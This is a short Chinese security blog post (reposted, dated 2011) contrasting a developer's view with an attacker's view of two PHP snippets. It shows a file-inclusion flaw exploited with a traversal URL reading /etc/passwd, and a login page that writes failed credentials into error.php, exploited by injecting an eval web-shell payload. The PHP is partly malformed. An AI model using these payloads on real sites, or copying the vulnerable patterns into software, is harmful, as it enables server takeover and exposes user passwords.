转载自:http://hi.baidu.com/micropoor
//2011-11-16 星期三
// 程序员的思维:
// Micropoor.php ---代码片段
<?php
$Micropoor=$_GET[Micropoor];
include($Micropoor.'php');
?>
//我们的思维:
http://www.127.0.0.1/Micropoor.php?Micropoor=/../../../../../etc/passwd%00
// 程序员的思维:
// Micropoor.php ---代码片段
<?php
//略
$fp = fopen($cacheFile, 'w');
fwrite($fp, $myvalues);
fclose($fp);
//略
?>
//login.php ---代码片段
<?php
$username=$_POST[‘username’];
$password=$_POST[‘password’];
$centent=time().”用户名$username登录错误,登录密码为:$password”;
$sql={sql}….
If(!={sql}){
$fp = fopen(error.php, 'w');
fwrite($fp, $centent);
fclose($fp);
echo “用户名或者密码错误!”
}
?>
//我们的思维:
*POST: username or password inject -> <?php%20eval($_POST[Micropoor])%20?> |
结论:一不留神便全军覆没
文章作者
Nuclear'Atk
上次更新
2011-11-17
许可协议
Nuclear'Atk(核攻击)网络安全实验室版权所有,转载请注明出处。